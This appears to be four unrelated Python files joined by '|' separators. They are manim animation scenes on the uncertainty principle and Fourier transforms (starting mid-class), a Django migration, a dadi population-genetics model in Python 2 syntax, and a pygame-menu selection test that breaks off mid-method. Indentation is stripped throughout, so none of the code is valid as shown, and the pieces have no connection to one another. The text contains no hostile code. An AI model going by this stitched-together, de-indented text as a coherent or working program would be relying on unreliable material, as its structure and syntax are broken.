self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
##
def get_wave_func(self):
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
# word.add_background_rectangle()
answer = VGroup()
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
###
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2),
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
self.add()
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
mathy, "",
bubble_kwargs = {"width" : 5},
look_at_arg = morty.eyes,
),
morty.change, "happy",
aops_logo.shift, 1.5*UP + 0.5*RIGHT
)
self.play(Blink(mathy))
self.wait()
self.play(
RemovePiCreatureBubble(
mathy, target_mode = "raise_right_hand"
),
aops_logo.to_corner, UP+RIGHT,
aops_logo.shift, MED_SMALL_BUFF*DOWN,
GrowFromPoint(book, mathy.get_corner(UP+LEFT)),
)
self.play(morty.change, "pondering", book)
self.wait(3)
self.play(Blink(mathy))
self.wait()
self.play(
Animation(
BackgroundRectangle(book, fill_opacity = 1),
remover = True
),
FadeOut(book),
)
print(self.num_plays)
self.play(
FadeOut(words),
ShowCreation(rect),
morty.restore,
morty.change, "happy", rect,
FadeOut(mathy),
)
self.wait(10)
self.play(ShowCreation(url_rect))
self.play(
FadeOut(url_rect),
url.get_part_by_tex("3b1b").set_color, BLUE,
)
self.wait(15)
class PuzzleStatement(Scene):
def construct(self):
aops_logo = AoPSLogo()
url = TextMobject("AoPS.com/3b1b")
url.next_to(aops_logo, UP)
group = VGroup(aops_logo, url)
group.to_edge(UP)
self.add(group)
words = TextMobject("""
AoPS must choose one of 20 people to send to a
tug-of-war tournament. We don't care who we send,
as long as we don't send our weakest person. \\\\ \\\\
Each person has a different strength, but we don't know
those strengths. We get 10 intramural 10-on-10 matches
to determine who we send. Can we make sure we don't send
the weakest person?
""", alignment = "")
words.set_width(FRAME_WIDTH - 2)
words.next_to(group, DOWN, LARGE_BUFF)
self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))
self.wait(2)
class UncertaintyEndScreen(PatreonEndScreen):
CONFIG = {
"specific_patrons" : [
"CrypticSwarm",
"Ali Yahya",
"Juan Benet",
"Markus Persson",
"Damion Kistler",
"Burt Humburg",
"Yu Jun",
"Dave Nicponski",
"Kaustuv DeBiswas",
"Joseph John Cox",
"Luc Ritchie",
"Achille Brighton",
"Rish Kundalia",
"Yana Chernobilsky",
"Shìmín Kuang",
"Mathew Bramson",
"Jerry Ling",
"Mustafa Mahdi",
"Meshal Alshammari",
"Mayank M. Mehrotra",
"Lukas Biewald",
"Robert Teed",
"Samantha D. Suplee",
"Mark Govea",
"John Haley",
"Julian Pulgarin",
"Jeff Linse",
"Cooper Jones",
"Desmos ",
"Boris Veselinovich",
"Ryan Dahl",
"Ripta Pasay",
"Eric Lavault",
"Randall Hunt",
"Andrew Busey",
"Mads Elvheim",
"Tianyu Ge",
"Awoo",
"Dr. David G. Stork",
"Linh Tran",
"Jason Hise",
"Bernd Sing",
"James H. Park",
"Ankalagon ",
"Mathias Jansson",
"David Clark",
"Ted Suzman",
"Eric Chow",
"Michael Gardner",
"David Kedmey",
"Jonathan Eppele",
"Clark Gaebel",
"Jordan Scales",
"Ryan Atallah",
"supershabam ",
"1stViewMaths",
"Jacob Magnuson",
"Chloe Zhou",
"Ross Garber",
"Thomas Tarler",
"Isak Hietala",
"Egor Gumenuk",
"Waleed Hamied",
"Oliver Steele",
"Yaw Etse",
"David B",
"Delton Ding",
"James Thornton",
"Felix Tripier",
"Arthur Zey",
"George Chiesa",
"Norton Wang",
"Kevin Le",
"Alexander Feldman",
"David MacCumber",
"Jacob Kohl",
"Frank Secilia",
"George John",
"Akash Kumar",
"Britt Selvitelle",
"Jonathan Wilson",
"Michael Kunze",
"Giovanni Filippi",
"Eric Younge",
"Prasant Jagannath",
"Andrejs olins",
"Cody Brocious",
],
}
class Thumbnail(Scene):
def construct(self):
uncertainty_principle = TextMobject("Uncertainty \\\\", "principle")
uncertainty_principle[1].shift(SMALL_BUFF*UP)
quantum = TextMobject("Quantum")
VGroup(uncertainty_principle, quantum).scale(2.5)
uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)
quantum.to_edge(DOWN, MED_LARGE_BUFF)
arrow = TexMobject("\\Downarrow")
arrow.scale(4)
arrow.move_to(Line(
uncertainty_principle.get_bottom(),
quantum.get_top(),
))
cross = Cross(arrow)
cross.set_stroke(RED, 20)
is_word, not_word = is_not = TextMobject("is", "\\emph{NOT}")
is_not.scale(3)
is_word.move_to(arrow)
# is_word.shift(0.6*UP)
not_word.set_color(RED)
not_word.set_stroke(RED, 3)
not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)
not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)
dot_cloud = ProbabalisticDotCloud(
n_copies = 1000,
)
dot_gdw = dot_cloud.gaussian_distribution_wrapper
# dot_gdw.rotate(3*DEGREES)
dot_gdw.rotate(25*DEGREES)
# dot_gdw.scale(2)
dot_gdw.scale(2)
# dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)
dot_gdw.move_to(quantum)
def get_func(a):
return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)
axes = Axes(
x_min = -6, x_max = 6,
x_axis_config = {"unit_size" : 0.25}
)
graphs = VGroup(*[
axes.get_graph(get_func(a))
for a in (10, 3, 1, 0.3, 0.1,)
])
graphs.arrange(DOWN, buff = 0.6)
graphs.to_corner(UP+LEFT)
graphs.set_color_by_gradient(BLUE_B, BLUE_D)
frequency_axes = Axes(
x_min = 0, x_max = 2,
x_axis_config = {"unit_size" : 1}
)
fourier_graphs = VGroup(*[
get_fourier_graph(
frequency_axes, graph.underlying_function,
t_min = -10, t_max = 10,
)
for graph in graphs
])
for graph, fourier_graph in zip(graphs, fourier_graphs):
fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)
fourier_graph.scale(3)
fourier_graph.stretch(3, 1)
fourier_graph.move_to(graph)
fourier_graph.to_edge(RIGHT)
self.add(graphs, fourier_graphs)
self.add(dot_cloud)
self.add(
uncertainty_principle, quantum,
)
self.add(arrow, cross)
# self.add(is_word)
# self.add(is_not)
|
# Generated by Django 2.0.1 on 2018-01-28 04:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20180128_1003'),
]
operations = [
migrations.AlterField(
model_name='letter',
name='subject',
field=models.CharField(max_length=100),
),
]
|
"""
Custom demographic model for our example.
"""
import numpy
import dadi
def prior_onegrow_mig((nu1F, nu2B, nu2F, m, Tp, T), (n1,n2), pts):
"""
Model with growth, split, bottleneck in pop2, exp recovery, migration
nu1F: The ancestral population size after growth. (Its initial size is
defined to be 1.)
nu2B: The bottleneck size for pop2
nu2F: The final size for pop2
m: The scaled migration rate
Tp: The scaled time between ancestral population growth and the split.
T: The time between the split and present
n1,n2: Size of fs to generate.
pts: Number of points to use in grid for evaluation.
"""
# Define the grid we'll use
xx = yy = dadi.Numerics.default_grid(pts)
# phi for the equilibrium ancestral population
phi = dadi.PhiManip.phi_1D(xx)
# Now do the population growth event.
phi = dadi.Integration.one_pop(phi, xx, Tp, nu=nu1F)
# The divergence
phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
# We need to define a function to describe the non-constant population 2
# size. lambda is a convenient way to do so.
nu2_func = lambda t: nu2B*(nu2F/nu2B)**(t/T)
phi = dadi.Integration.two_pops(phi, xx, T, nu1=nu1F, nu2=nu2_func,
m12=m, m21=m)
# Finally, calculate the spectrum.
sfs = dadi.Spectrum.from_phi(phi, (n1,n2), (xx,yy))
return sfs
def prior_onegrow_mig_mscore((nu1F, nu2B, nu2F, m, Tp, T)):
"""
ms core command corresponding to prior_onegrow_mig
"""
# Growth rate
alpha2 = numpy.log(nu2F/nu2B)/T
command = "-n 1 %(nu1F)f -n 2 %(nu2F)f "\
"-eg 0 2 %(alpha2)f "\
"-ma x %(m)f %(m)f x "\
"-ej %(T)f 2 1 "\
"-en %(Tsum)f 1 1"
# There are several factors of 2 necessary to convert units between dadi
# and ms.
sub_dict = {'nu1F':nu1F, 'nu2F':nu2F, 'alpha2':2*alpha2,
'm':2*m, 'T':T/2, 'Tsum':(T+Tp)/2}
return command % sub_dict
def prior_onegrow_nomig((nu1F, nu2B, nu2F, Tp, T), (n1,n2), pts):
"""
Model with growth, split, bottleneck in pop2, exp recovery, no migration
nu1F: The ancestral population size after growth. (Its initial size is
defined to be 1.)
nu2B: The bottleneck size for pop2
nu2F: The final size for pop2
Tp: The scaled time between ancestral population growth and the split.
T: The time between the split and present
n1,n2: Size of fs to generate.
pts: Number of points to use in grid for evaluation.
"""
return prior_onegrow_mig((nu1F, nu2B, nu2F, 0, Tp, T), (n1,n2), pts)
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
TEST WIDGET SELECTION.
Test widget selection effects.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""
__all__ = ['SelectionTest']
from test._utils import MenuUtils, surface
import copy
import unittest
from pygame_menu.widgets import Button
from pygame_menu.widgets.selection import LeftArrowSelection, RightArrowSelection, \
HighlightSelection, NoneSelection, SimpleSelection
from pygame_menu.widgets.core.selection import Selection
from pygame_menu.widgets.selection.arrow_selection import ArrowSelection
class SelectionTest(unittest.TestCase):
def setUp(self) -> None:
"""
Setup sound engine.
"""
self.menu = MenuUtils.generic_menu()
self.menu.enable()
def test_copy(self) -> None:
"""
Test copy.
"""
s = LeftArrowSelection()
s1 = copy.copy(s)
s2 = copy.deepcopy(s)
s3 = s.copy()
self.assertNotEqual(s, s1)
self.assertNotEqual(s, s2)
self.assertNotEqual(s, s3)
def test_abstracts(self) -> None:
"""
Test abstract objects errors.
"""
w = Button('epic')
# Create abstract selection object
sel = Selection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: sel.draw(surface, w))
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_arrow(self) -> None:
"""
Test arrow selection.
"""
w = Button('epic')
w.set_selection_effect(LeftArrowSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
w.set_selection_effect(RightArrowSelection())
self.menu.draw(surface)
# Create abstract arrow selection
arrow = ArrowSelection(0, 0, 0, 0)
self.assertRaises(NotImplementedError, lambda: arrow.draw(surface, w))
def test_highlight(self) -> None:
"""
Test highlight selection.
"""
w = Button('epic')
border_width = 1
margin_x = 18
margin_y = 10
w.set_selection_effect(HighlightSelection(
border_width=border_width,
margin_x=margin_x,
margin_y=margin_y
))
self.menu.add.generic_widget(w)
self.menu.draw(surface)
# noinspection PyTypeChecker
sel: 'HighlightSelection' = w.get_selection_effect()
self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
# Test inflate
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
# Test margin xy
sel.margin_xy(10, 20)
